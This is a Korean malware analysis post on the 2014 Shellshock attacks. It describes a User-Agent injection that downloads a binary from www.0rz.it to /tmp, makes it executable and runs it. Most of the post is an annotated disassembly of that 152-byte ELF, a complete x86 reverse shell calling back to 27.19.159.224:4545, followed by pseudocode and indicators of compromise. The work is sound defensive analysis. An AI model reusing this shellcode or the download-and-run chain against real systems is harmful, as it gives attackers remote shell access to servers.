CVE-2014-6271 linux zero-day attack

취약점이 발표되고 하루 뒤, 리눅스 시스템을 대상으로 0day 공격이 시작되었다. 공격자는 HTTP 요청의 'User-Agent' 헤더에 공격 코드를 삽입하여 다수의 서버를 대상으로 공격을 수행하였다. 다음은 HTTP 요청 패킷 중 공격 코드만 잘라낸 것이다.

003

위 내용은 다음과 같은 명령을 수행한다.

  1. wget으로 www.0rz.it의 fu4k 바이너리를 /tmp/fu4k 로 저장한다. 현재 저 주소는 막혀있다.
  2. chmod로 저장한 악성코드에 실행 권한을 준다.
  3. 저장한 악성코드를 실행한다.

이 악성코드는 152바이트 크기의 매우 작은 바이너리다. 아래 디스어셈블 결과를 보면 섹션 헤더도 심볼도 없이 읽기/쓰기/실행(RWX) 권한의 PT_LOAD 세그먼트 하나만 가진 수제 ELF로, 사실상 쉘코드를 ELF 헤더로 감싼 형태이며, 코드를 분석해보면 리버스 쉘을 제공하는 프로그램이다.

LOAD:08048000 ; Input MD5 : 2485040231A35B7A465361FAF92A512D
LOAD:08048000 ; Input CRC32 : 1F643AE0
LOAD:08048000
LOAD:08048000 ; File Name : /Users/n0fate/Dropbox/malware/Shellshock/fu4k/2485040231a35b7a465361faf92a512d
LOAD:08048000 ; Format : ELF for Intel 386 (Executable)
LOAD:08048000 ; Imagebase : 8048000
LOAD:08048000 ;
LOAD:08048000 ; IDA listing of the 152-byte "fu4k" payload dropped by the Shellshock
LOAD:08048000 ; attack. It is a hand-built ELF: no section headers, no symbols, a single
LOAD:08048000 ; RWX PT_LOAD segment, and the code starts right after the program header.
LOAD:08048000 ; The body is a classic x86 Linux reverse-shell stub (socket -> dup2 x3 ->
LOAD:08048000 ; connect -> execve /bin//sh). This is a malware listing for analysis only;
LOAD:08048000 ; do not assemble or execute it.
LOAD:08048000
LOAD:08048000 .686p
LOAD:08048000 .mmx
LOAD:08048000 .model flat
LOAD:08048000 .intel_syntax noprefix
LOAD:08048000
LOAD:08048000 ; ===========================================================================
LOAD:08048000
LOAD:08048000 ; Segment type: Pure code
LOAD:08048000 ; Segment permissions: Read/Write/Execute (p_flags = 7 below: the only segment is RWX)
LOAD:08048000 LOAD segment mempage public 'CODE' use32
LOAD:08048000 assume cs:LOAD
LOAD:08048000 ;org 8048000h
LOAD:08048000 assume es:nothing, ss:nothing, ds:LOAD, fs:nothing, gs:nothing
LOAD:08048000 dword_8048000 dd 464C457Fh, 10101h, 2 dup(0) ; ELF header. e_ident: "\x7FELF", ELFCLASS32, little-endian, EV_CURRENT, then padding
LOAD:08048000 ; (referenced as p_vaddr / p_paddr at 0804803C and 08048040)
LOAD:08048010 dd 30002h, 1, 8048054h, 34h, 2 dup(0) ; e_type=ET_EXEC, e_machine=EM_386; e_version=1; e_entry=08048054 (start); e_phoff=0x34; e_shoff=0, e_flags=0 (no section headers at all)
LOAD:08048028 dd 200034h, 1, 0 ; e_ehsize=0x34, e_phentsize=0x20; e_phnum=1, e_shentsize=0; e_shnum=0, e_shstrndx=0
LOAD:08048034 dd 1, 0 ; program header (follows the ELF header directly): p_type=PT_LOAD, p_offset=0 (the whole file, header included, is mapped)
LOAD:0804803C dd offset dword_8048000 ; p_vaddr = 08048000
LOAD:08048040 dd offset dword_8048000 ; p_paddr = 08048000
LOAD:08048044 dd 98h, 0DCh, 7, 1000h ; p_filesz=0x98 (152 bytes = the entire file), p_memsz=0xDC (0x44 extra zero-filled bytes), p_flags=7 (R+W+X: code executes from a writable page), p_align=0x1000
LOAD:08048054 ; ---------------------------------------------------------------------------
LOAD:08048054
LOAD:08048054 public start
LOAD:08048054 start:
LOAD:08048054 xor ebx, ebx ; ebx = 0
LOAD:08048056 mul ebx ; eax = edx = 0 (shellcode idiom for zeroing both); edx stays 0 and is reused as NULL below
LOAD:08048058 push ebx ; arg[2] = IPPROTO_IP (0)
LOAD:08048059 inc ebx ; ebx = 1: both SOCK_STREAM and the SYS_SOCKET socketcall subcode
LOAD:0804805A push ebx ; arg[1] = SOCK_STREAM
LOAD:0804805B push PF_INET ; arg[0] = PF_INET (2); analyst's reference: https://github.com/xiam/harmful-stuff/blob/master/bind/bind-linux-x86.asm
LOAD:0804805D mov ecx, esp ; ecx -> {PF_INET, SOCK_STREAM, IPPROTO_IP}
LOAD:0804805F mov al, 102 ; eax = sys_socketcall (eax was 0, so the upper bytes are clean)
LOAD:08048061 int 80h ; socketcall(SYS_SOCKET, args) -> eax = socket fd
LOAD:08048063 xchg eax, ebx ; ebx = socket fd; eax = 1 (discarded)
LOAD:08048064 pop ecx ; ecx = 2: the pushed PF_INET value is reused as the dup2 loop counter (starts at stderr)
LOAD:08048065
LOAD:08048065 connect: ; misnamed label: this loop is dup2(), the actual connect() is issued below
LOAD:08048065 mov al, 63 ; eax = sys_dup2 (eax is 1 or a small fd here, so the upper bytes are 0)
LOAD:08048067 int 80h ; dup2(sockfd, ecx)
LOAD:08048069 dec ecx ; next fd: 2 -> 1 -> 0 -> -1
LOAD:0804806A jns short connect ; repeat while ecx >= 0: stdin, stdout and stderr now all refer to the socket
LOAD:0804806C push 0E09F131Bh ; sin_addr = bytes 1B 13 9F E0 = 27.19.159.224 (attacker C2)
LOAD:08048071 push 0C1110002h ; sin_family = AF_INET (2), sin_port = 0x11C1 = 4545 in network byte order
LOAD:08048071 ; only 8 of the 16 sockaddr_in bytes are written; sin_zero is whatever happens to be on the stack
LOAD:08048076 mov ecx, esp ; ecx -> sockaddr_in
LOAD:08048078 mov al, 102 ; eax = sys_socketcall (eax = 0, the return of the last dup2(sockfd, 0))
LOAD:0804807A push eax ; arg[2] = addrlen = 102: eax reused as a "big enough" length. NOTE(review): oversized vs sizeof(sockaddr_in)=16; the kernel appears to accept any length >= 16 that fits sockaddr_storage - confirm
LOAD:0804807B push ecx ; arg[1] = &sockaddr_in
LOAD:0804807C push ebx ; arg[0] = sockfd
LOAD:0804807D mov bl, 3 ; ebx = SYS_CONNECT; only the low byte is set, relies on sockfd < 256 (presumably 3 in a fresh process)
LOAD:0804807D ; connect(sockfd, {AF_INET, 4545, 27.19.159.224}, 102)
LOAD:0804807F mov ecx, esp ; ecx -> {sockfd, &addr, addrlen}
LOAD:08048081 int 80h ; socketcall(SYS_CONNECT, args); the return value is never checked
LOAD:08048083 push edx ; edx is still 0: NUL terminator for the path string
LOAD:08048084 push 'hs//' ; "//sh" (little-endian)
LOAD:08048089 push 'nib/' ; "/bin" -> stack now holds "/bin//sh\0"; the doubled slash pads the path to 8 bytes with no NUL in the immediates
LOAD:0804808E mov ebx, esp ; ebx = filename = "/bin//sh"
LOAD:08048090 push edx ; argv[1] = NULL
LOAD:08048091 push ebx ; argv[0] = "/bin//sh"
LOAD:08048092 mov ecx, esp ; ecx = argv
LOAD:08048094 mov al, 11 ; eax = sys_execve; edx (0) doubles as envp = NULL
LOAD:08048094 ; execve("/bin//sh", {"/bin//sh", NULL}, NULL). Only al is set: if connect() failed, eax holds -errno and this is not a valid syscall number. NOTE(review): presumably the shell is then simply never spawned - confirm
LOAD:08048096 int 80h ; on success the shell's stdin/stdout/stderr are the C2 socket: a reverse shell
LOAD:08048096 ; ---------------------------------------------------------------------------
LOAD:08048098 dd 11h dup(?) ; 0x44 bytes past p_filesz: exist only in memory (p_memsz - p_filesz), zero-filled by the loader, not reached on the success path
LOAD:08048098 LOAD ends ; reference: http://www.backtrack-linux.org/forums/archive/index.php/t-51108.html
LOAD:08048098 ; ######################################################
LOAD:08048098 ; pseudo code:
LOAD:08048098 end start ;
LOAD:08048098 ; int s = socket(PF_INET, SOCK_STREAM, IPPROTO_IP);
LOAD:08048098 ; for (int i = 2; i >= 0; i--)
LOAD:08048098 ;     dup2(s, i);                  /* stderr, stdout, stdin */
LOAD:08048098 ;
LOAD:08048098 ; connect(s, {AF_INET, htons(4545), 27.19.159.224}, 102);   /* result unchecked */
LOAD:08048098 ; execve("/bin//sh", {"/bin//sh", NULL}, NULL);          /* envp = NULL */
LOAD:08048098 ;
LOAD:08048098 ; IOCs: outbound TCP to 27.19.159.224:4545, file /tmp/fu4k (fetched from www.0rz.it)
LOAD:08048098 ; ######################################################

악성코드는 소켓을 만들어 dup2로 stderr, stdout, stdin(2, 1, 0)에 차례로 복제한 뒤 27.19.159.224:4545(TCP)로 connect하고, /bin//sh를 execve한다. connect의 반환값은 확인하지 않으며, 세 표준 입출력이 모두 소켓에 연결되어 있으므로 연결만 성공하면 공격자는 대화형 쉘을 얻게 된다. 이 서버는 중국 우한(Wuhan)시에 있는 것으로 나타나 있다. 탐지 관점에서는 웹 서버 프로세스가 www.0rz.it에서 파일을 받아 /tmp/fu4k를 생성·실행하는 행위와 27.19.159.224:4545로의 아웃바운드 TCP 연결이 지표가 된다.

004

 

Reference

Malware Must Die!, Linux ELF bash 0day: The fun has only just begun..., http://blog.malwaremustdie.org/2014/09/linux-elf-bash-0day-fun-has-only-just.html